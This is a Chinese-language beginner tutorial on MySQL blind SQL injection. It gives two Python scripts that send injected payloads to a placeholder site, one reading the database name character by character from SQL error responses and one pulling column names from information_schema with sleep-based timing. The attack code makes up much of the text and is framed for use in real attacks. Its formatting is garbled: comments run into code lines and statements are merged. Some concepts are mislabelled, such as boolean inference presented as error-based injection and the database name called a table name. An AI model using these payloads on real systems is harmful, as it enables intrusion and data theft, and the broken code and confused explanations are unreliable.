初学者必备浅谈MySQL一般盲注攻击技术(mysql一般盲注)
初学者必备:浅谈MySQL一般盲注攻击技术
随着互联网的快速发展,网络攻击已经成为一件不可避免的事情。其中,盲注攻击是一种比较常见的攻击方式,这种攻击方式需要攻击者对目标数据库的结构、数据表的列名等信息有所了解。
本文将对初学者介绍MySQL一般盲注攻击技术,并给出相关的代码实现。
一、什么是MySQL盲注攻击
MySQL盲注攻击是指在没有获取到数据库结构等信息的情况下,通过一些特殊手段进行SQL注入攻击,目的是获取数据库表中的敏感信息或者执行一些恶意操作。MySQL盲注攻击可以分为时间盲注和报错盲注两种方式。
二、报错盲注攻击
报错盲注攻击是指通过向目标数据库发送一些恶意的SQL语句,达到让目标数据库返回错误信息的目的。在这种攻击方式中,攻击者需要不断地进行尝试,得到数据库结构、数据表名、列名等信息。
下面给出一个简单的演示代码:
import requests
url = 'http://www.target.com/page.php?id='
length = 0 # 数据长度result = '' # 最终结果
# 获取数据库表名长度for i in range(1, 20):
payload = "'+and+length(database())={}+--+".format(i) response = requests.get(url + payload)
if 'You have an error in your SQL syntax;' in response.text: length = i
break
# 获取数据库表名for i in range(1, length+1):
for j in range(32, 126): payload = "'+and+ascii(substr(database(),{},1))={}+--+".format(i, j)
response = requests.get(url + payload) if 'You have an error in your SQL syntax;' not in response.text:
result += chr(j) break
print('数据库表名为:', result)
上面的代码中,我们首先获取了数据库名称的长度,然后再逐位获取数据库名称。具体而言,我们在SQL语句的参数部分,使用substr()函数获取到指定位置的字符,然后使用ascii()函数将其转换为对应的ASCII码,最后再通过循环尝试所有可见字符,来获取该位置上的字符值。
三、时间盲注攻击
时间盲注攻击是一种相对难度较大的盲注攻击方式。攻击者通过构造SQL语句,使得当SQL语句条件成立时,目标数据库中会有一定的延时现象,攻击者可以根据延迟时间推断出目标数据库结构和数据表中的数据。
下面给出一个简单的演示代码:
import requests
import time
url = 'http://www.target.com/page.php?id='
length = 0 # 数据长度result = '' # 最终结果
# 获取列名长度for i in range(1, 20):
payload = "'+and+if(length((select+column_name+from+information_schema.columns+where+table_name='users'+limit+0,1))={},sleep(5),1)+--+".format(i) start_time = time.time()
response = requests.get(url + payload) end_time = time.time()
if end_time - start_time > 5: length = i
break
# 获取列名for i in range(1, length+1):
for j in range(32, 126): payload = "'+and+if(ascii(substr((select+column_name+from+information_schema.columns+where+table_name='users'+limit+0,1),{},1))={},sleep(5),1)+--+".format(i, j)
start_time = time.time() response = requests.get(url + payload)
end_time = time.time() if end_time - start_time > 5:
result += chr(j) break
print('列名为:', result)
上面的代码中,我们首先通过构造查询语句,获取到我们需要的信息,然后对获取到的结果进行比较操作,以此来判断结果是否正确。具体而言,这里我们使用sleep(5)函数来模拟目标数据库的延时情况,如果实际延时时间大于5s,则我们认为查询结果是正确的,否则就认为不正确。同样是通过循环遍历所有可见字符,来获取该位置上的字符值。
四、总结
MySQL盲注攻击是一种比较常见的SQL注入攻击方式,攻击者需要了解目标数据库的结构、数据表名、列名等信息。在实际攻击中,我们可以通过构造SQL语句,来进行盲注攻击。本文提供了报错盲注和时间盲注两种攻击方式的演示代码,希望对初学者有所帮助。当然,实际攻击中还需要更加复杂的手段,这里只是提供一些思路和范例。